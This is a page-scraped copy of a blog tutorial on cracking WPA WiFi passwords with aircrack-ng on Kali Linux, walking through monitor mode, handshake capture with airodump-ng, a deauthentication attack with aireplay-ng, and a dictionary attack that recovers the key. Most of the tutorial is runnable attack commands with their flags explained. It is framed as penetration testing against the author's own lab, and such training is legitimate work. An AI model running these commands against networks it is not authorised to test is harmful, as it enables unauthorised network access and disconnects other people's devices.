100% found this document useful (1 vote)
677 views1 page

Beginner's Guide to WiFi Cracking

This document provides a beginner's guide to cracking WiFi passwords using Aircrack-Ng on Kali Linux. It explains how to put the wireless adapter into monitor mode, capture handshakes using airodump-ng and aireplay-ng, and crack the password with aircrack-ng using a dictionary attack. Key steps include starting airodump-ng to capture available networks, launching a deauthentication attack to get a handshake, and using aircrack-ng to crack the password with a dictionary file.
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
100% found this document useful (1 vote)
677 views1 page

Beginner's Guide to WiFi Cracking

This document provides a beginner's guide to cracking WiFi passwords using Aircrack-Ng on Kali Linux. It explains how to put the wireless adapter into monitor mode, capture handshakes using airodump-ng and aireplay-ng, and crack the password with aircrack-ng using a dictionary attack. Key steps include starting airodump-ng to capture available networks, launching a deauthentication attack to get a handshake, and using aircrack-ng to crack the password with a dictionary file.
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 1

Hacking Articles

Raj Chandel's Blog

Courses We Offer CTF Challenges Penetration Testing Web Penetration Testing Red Teaming Donate Us 

 Home » Kali Linux » Crack Wi Password using Aircrack-Ng (Beginner’s Guide)

Kali Linux , Penetration Testing , Wireless Hacking Search

Crack Wi Password using Aircrack-Ng (Beginner’s Guide)


Search … Search
June 25, 2016 By Raj Chandel

This is the classical method of wireless password cracking .All the tools use this method in one way or
other.
Subscribe To Blog Via Email
First start the monitor mode which will listen to all the wi connections nearby with command:

airmon-ng start wlan0 Email Address



In your lower right corner you will see written. monitor mode enabled for [phy1]wlan0mon
Subscribe

Join Our Training Programs

Now run the following command to con rm that our wi adaptor is in monitor mode, so run
command: Follow Me On Twitter
ifcon g

which will show you the wi adaptor as wlan0mon meaning adaptor is in monitor mode. Hacking Articles
@hackinarticles
Now run command: Comprehensive Guide on Password
Spraying Attack
airodump-ng wlan0mon
Today we deal with the technique that at
The above command will start listening to all the available wi connections. first sounds very much similar to
Bruteforcing but trust me, it is not brute-
Now when your target appeas hit ctrl^c and then to capture the handshake type command: force. It is Password Spraying.
hackingarticles.in/comprehensive-
airodump-ng -c 7 –bssid C8:XX:35:XX:FD:F0  –write 1 wlan0mon …#infosec #ctf #redteam #hacking

Here,

 -c is the channel no. of the AP which will be listed in CH column in the output of above command as
in my case it is 7.

–bssid is the MAC address of the target AP as in my case it is rajlab and bssid is  C8:3A:XX:44:XX:F0

–write is the capture le in which the capture packets will be saved as in my case i have named it as
1 .  May 2, 2021

Option Description
-c The channel for the wireless network
–bssid The MAC address of the access point
-w The le name pre x for the le which will contain authentication handshake
mon0 The wireless interface

Categories

Cryptography & Stegnography

CTF Challenges

Cyber Forensics

Database Hacking

Footprinting

Hacking Tools

Kali Linux

Nmap

Others

Password Cracking

Penetration Testing

Pentest Lab Setup

Privilege Escalation

Red Teaming

Social Engineering Toolkit

Uncategorized

Website Hacking

Window Password Hacking


Now start the deauth attack to disconnect all the connected clients to that AP which will help in
Wireless Hacking
capturing the handshake with command:

aireplay-ng -0 100 –a XX:3A:35:XX:FD:F0  -e rajlab wlan0mon

Here, Articles
-0 is used for deauth attack

100 is no. of deauth packets to be sent Select Month

-a is the target AP MAC address

-e is ESSID of the target AP i.e. name of the target AP 

After launching the deauth attack we will get the WPA handshake in the previous terminal window in
the top right corner then hit ctrl^c.

Now we have to crack the password with aircrack-ng so type command :

aircrack-ng 1-01.cap –w /usr/share/nmap/nselib/data/passwords.lst

Here,

1-01.cap is the capture le we generated in the airodump-ng .

-w is the dictionary to be used to perform dictionary attack

In my case the key is found as KEY FOUND! [raj123987]

Author: Himanshu Gupta is a Information Security Researcher | Technical writer. You can follow him
on LinkedIn .

 FACEBOOK  T WITTER  PINTEREST  LINKEDIN

 PREVIOUS POST NEXT POST 


Cracking WiFi Password using Fern WIFi Cracker 3 Ways to Crack Wi using Pyrit, oclHashcat and
Cowpatty

Leave a Reply

Your email address will not be published. Required elds are marked *

Comment *

Name *

Email *

Website

Notify me of follow-up comments by email.

Notify me of new posts by email.

Post Comment

You may like

Wireshark for Pentester: Password Sni ng Wireshark For Pentester: A Beginner’s Guide
April 28, 2021 April 13, 2021

You might also like